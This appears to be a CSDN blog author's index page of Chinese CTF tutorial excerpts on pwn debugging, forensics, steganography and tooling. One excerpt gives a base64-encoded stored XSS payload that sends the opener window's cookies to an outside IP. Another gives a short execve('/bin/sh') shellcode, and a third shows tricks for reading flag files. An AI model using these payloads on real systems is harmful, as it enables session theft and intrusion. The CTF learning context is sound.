CTF
fjh1997
这个作者很懒,什么都没留下…
展开
-
ctf没有cat等程序等情况下读取flag
tcsh 读10行echo '@ num = 10\nwhile ( $num > 1 )\n set word = "$<"\n echo "$word"\n @ num -= 1\n # rest of code...\nend\n' > /b.sh && source /b.sh < /etc/ctf/flag.txtbashecho $(</etc/ctf/flag.txt)原创 2021-07-25 21:32:26 · 800 阅读 · 0 评论 -
ctfd批量导出misc题目脚本
sudo docker exec 84 mysql -uctfd -pctfd -e "set character_set_results='utf8';use ctfd;select * from challenges join flags on challenges.id=flags.challenge_id left join files on challenges.id=files.challenge_id where category = 'misc' ;"原创 2021-07-07 15:14:10 · 261 阅读 · 0 评论 -
使用objcopy选择性修改删除符号表以及其他相关elf段以及gdb debug file 任意读漏洞以及xctf mamadebug writeup
objcopy --keep-symbol main --strip-all hello.debug hello2.debug #除了main函数的符号表保留外,其余都删除,这样可以大大减少体积。由于一个elf文件里面的调试信息和符号信息占用了很大的空间,而这些信息只是调试的时候才用到,平时运行的时候用不到。所以我们可以把这部分信息单独dump出来作为一个独立的文件。开发者在需要调试的时候可以下载这个文件来恢复elf的调试信息和符号表。objcopy --only-keep-debug foo f原创 2021-05-31 18:27:51 · 1789 阅读 · 0 评论 -
解决GitHub的raw.githubusercontent.com无法连接问题
举个例子原来的资源链接是这样的https://github.com/sixstars/starctf2021/blob/main/pwn-babypac/main.c后来的资源链接就可以这样访问https://cdn.jsdelivr.net/gh/sixstars/starctf2021/pwn-babypac/main.c或者https://cdn.jsdelivr.net/gh/sixstars/starctf2021@main/pwn-babypac/main.c参考:https://原创 2021-01-29 19:41:50 · 5556 阅读 · 0 评论 -
构建ubuntu20 pwn题目镜像出现cp: cannot overwrite non-directory ‘/home/ctf/lib‘ with directory ‘ /usr/lib‘
cp: cannot overwrite non-directory " /home/ctf/lib’ with directory ’/usr/lib ’ cp: cannot overwrite non-directory ’ /home/ctf/lib32’ withdirectory ’ /usr/lib32 ’ cp: cannot overwrite non-directory ’/home/ctf/lib64’ with directory ’ /usr/lib64 cp: cann.原创 2021-01-29 19:37:20 · 1840 阅读 · 3 评论 -
使用基于llvm的clang编译arm pwn题目以及arm pwn使用qemu调试脚本
这里以starctf2021的babypac为例https://github.com/sixstars/starctf2021/blob/main/pwn-babypac/main.csudo apt install qemu-usersudo apt install gcc-aarch64-linux-gnusudo apt install clangwget https://cdn.jsdelivr.net/gh/sixstars/starctf2021@main/pwn-babypac/ma原创 2021-01-28 19:18:40 · 781 阅读 · 1 评论 -
目标为_blank的存储型xss
amF2YXNjcmlwdDp3aW5kb3cub3BlbmVyLmRvY3VtZW50LmhlYWQuaW5uZXJIVE1MICs9JzxpbWcgc3JjPWh0dHA6Ly9sOTIuMTY4LjQ4LjY6Njc5MD9jb29raWU9JysgZXNjYXBlKHdpbmRvdy5vcGVuZXIuZG9jdW1lbnQuY29va2llKSArICcvPic7原创 2021-01-19 14:32:31 · 177 阅读 · 0 评论 -
CTF python 0 1转化为二维码
from PIL import Imagefrom zlib import *MAX = 36pic = Image.new("RGB",(MAX,MAX))str ="1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111000000011110010000000011000000011111011111111100110000原创 2020-12-23 16:56:36 · 3489 阅读 · 0 评论 -
关于IDA加载cryptsp.dll符号表失败的问题
最近和师傅们一起做题,有的师傅可以打开cryptsp.dll文件里面显示出很多加密函数但我的就不行是这样经过查找资料发现是IDA没有成功加载windows的符号表,解决方法如下:1.安装windbg,首先下载windows 10 sdk installer:https://developer.microsoft.com/zh-cn/windows/downloads/windows-10-sdk/勾选这个2.其次如这个帖子所说https://blog.csdn.net/m0_3792108原创 2020-08-21 15:12:44 · 1148 阅读 · 0 评论 -
x86_64平台下的ubuntu调试Mips并连接pwntools与gdb
sudo apt updatesudo apt install qemu-user libc6-mipsel-cross qemu-user-binfmt gdb-multiarchsudo mkdir /etc/qemu-binfmtsudo ln -s /usr/mipsel-linux-gnu /etc/qemu-binfmt/mipsel检查路径是否正确>>>...原创 2020-05-06 20:10:16 · 1585 阅读 · 0 评论 -
记一次奇怪的truecrypt解密,隐藏分区的MasterKey
地址题目地址: https://buuoj.cn/challenges#[V&N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B]%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81参考了夏风大佬的博客: https://blog.xiafeng2333.top/ctf-25/说明在这道题里面,最终的一个VOL加密文件,可以通过passphr...原创 2020-05-06 13:35:21 · 3030 阅读 · 0 评论 -
BUUCTF 登陆验证失败 "Please check the reCaptcha box to verify you are human"错误的解决方法
针对Windows系统,修改host在C:\Windows\System32\drivers\etc文件中。针对linux和mac,在/etc/host文件里面。添加如下两行:203.208.40.119 recaptcha.net203.208.41.88 www.gstatic.cn重启浏览器即可。...原创 2020-05-06 10:15:36 · 12805 阅读 · 0 评论 -
记一次CTF的USB流量分析
最近在研究鼠标流量,找到如下的文章:https://www.cnblogs.com/hackxf/p/10670844.html根据这个师傅的说法,不同的鼠标抓到的流量不一样,一般的鼠标流量是四个字节,第一个字节表示按键指示左键右键,第二个字节表示水平位移,为正(小于127)是向右移动,为负(补码负数,大于127小于255)是向左移动。第三个字节表示垂直位移,为正(小于127)是向上移动,为负...原创 2020-04-29 16:20:02 · 7224 阅读 · 2 评论 -
CTF jpg thumbnail隐写
需要安装exiftool,将flag.jpg 隐藏到challenge.jpg的tag.jpg 隐藏到challenge.jpg的thumbnail中exiftool -b -ThumbnailImage flag.jpg > thumbnail.jpgexiftool "-ThumbnailImage<=thumbnail.jpg" challenge.jpg...原创 2020-04-28 11:46:24 · 1419 阅读 · 0 评论 -
png IDHR修改高度宽度枚举脚本以及提取zlib脚本
#python3import binasciifrom Crypto.Util import numberp = open('perceptron2.png','rb').read() #修改IDHR宽度导致图片模糊的文件# print(p[0x14:0x17]+chr(0xaf).encode()[-1:])count = 0height=160 #这里设置高度为160像素,越大越好...原创 2020-04-27 12:51:34 · 1244 阅读 · 1 评论 -
解决64位栈溢出ret2lib时的 do_system movaps xmmword ptr [rsp + 0x40], xmm0 crash的问题
Thread 2.1 "protect" received signal SIGSEGV, Segmentation fault.0x00007f6f2b2942f6 in do_system (line=0x7f6f2b3f8e9a "/bin/sh") at ../sysdeps/posix/system.c:125125 in ../sysdeps/posix/system.cLEG...原创 2020-04-25 19:44:26 · 2887 阅读 · 3 评论 -
linux我知道的最短shellcode
长度19xor eax, eaxpush eaxpush 0x68732f2fpush 0x6e69622fxchg ebx, espmov al, 0xbint 0x80来源:https://www.exploit-db.com/exploits/40131原创 2020-04-16 11:50:52 · 1352 阅读 · 2 评论 -
python数字与字节互相转换number to bytes,bytes to number
数字到字节>>> n = 80>>> n.to_bytes(2, 'big')b'P'字节到数字 int.from_bytes(b'P', 'big')原创 2020-04-16 10:46:22 · 3682 阅读 · 0 评论 -
如何做到一边使用pwntools一边使用gdb下断点到main函数前
在回答这个问题的时候,我相信绝大多数师傅调试都是按照下面这个格式:from pwn import *payload=b'aaaaaa'sh=process("./pwn")gdb.attach(sh,"break main")sh.sendline(payload)但是很遗憾,这样调试有一个缺点,那就是gdb在attach到程序之后,你要调试的断点可能已经早就过去了,来不及下断点,这...原创 2020-04-10 15:44:55 · 6820 阅读 · 2 评论 -
解决一种pwn本地打不通远程打得通的问题
最近就遇到了这样的怪题目,本地劫持指针到execve()的int 80系统调用的时候,本地会卡住,远程却可以,我的建立的shellcode是这样的: push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp xor ecx, ecx push 0x8 pop eax inc eax ...原创 2020-04-06 17:21:05 · 1744 阅读 · 0 评论 -
jsfuck、jjencode、aaencode解码方法
jsfuck、jjencode、aaencode可以被很轻易的还原:第一步:首先打开谷歌浏览器,进入浏览器控制台。第二步:去掉最后一行末尾的(),复制加密后的代码;第三步:在console控制台粘贴你第二步复制的代码;第四步:回车,达到便能得到解密后的代码。...原创 2020-04-05 11:01:55 · 8696 阅读 · 0 评论